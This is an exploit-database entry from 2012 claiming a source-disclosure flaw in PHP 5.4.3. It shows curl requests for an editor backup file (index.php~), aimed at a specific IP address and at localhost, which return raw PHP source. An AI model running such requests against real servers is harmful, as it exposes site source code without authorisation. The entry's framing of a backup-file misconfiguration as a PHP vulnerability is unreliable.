PHP 5.4.3 (cli) code read vulnerability



EKU-ID: 2307 CVE: OSVDB-ID:
Author: cheki Published: 2012-06-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=============================================================
# Exploit Title: PHP 5.4.3 (cli) code read vulnerability

# Date: 2012/13/06

# Author: cheki

# Software Link: http://php.net/downloads.php

# Version: PHP 5.4.3 (cli) (built: May  9 2012 15:06:10)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies

# Category: remote

# Tested on: Fedora release 17 (Beefy Miracle)
=============================================================

#Demo: [root@cheki]# curl 109.234.119.2/index.php~

result: <?php

phpinfo();

?>

#Target: http://localhost/index.php~

result: <?php

phpinfo();

?>
============================================================

[root@cheki]# curl 109.234.119.2/index.php

result: NULL

#Target: http://localhost/index.php

result: NULL

===========================================================

# Greetings to: kaxa giorgashvili, anuka bolqvadze, 1337day.com members and hacking.ge